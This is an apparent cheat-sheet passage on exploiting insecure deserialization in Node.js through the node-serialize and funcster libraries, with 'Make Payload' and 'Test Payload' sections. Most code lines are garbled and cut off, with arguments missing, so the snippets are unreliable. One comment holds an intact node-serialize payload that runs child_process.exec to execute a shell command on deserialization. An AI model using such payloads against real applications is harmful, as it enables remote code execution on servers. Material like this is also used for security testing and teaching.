Link to this headingNode JS Deseralization
Link to this headingUsing node-serialize library
Make Payload:
var y =
var serialize = require;
var payload_serialized = serialize.;
console.log;
//{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
Test Payload:
var serialize = require;
var test = ;
serialize.;
Link to this headingUsing funcster Library
Make Payload:
funcster = require;
//Serialization
var test = funcster.
console.log // { __js_function: 'function(){return"Hello world!"}' }
Test Payload:
//Deserialization with auto-execution
var desertest1 =
funcster.
var desertest2 =
funcster.
var desertest3 =
funcster.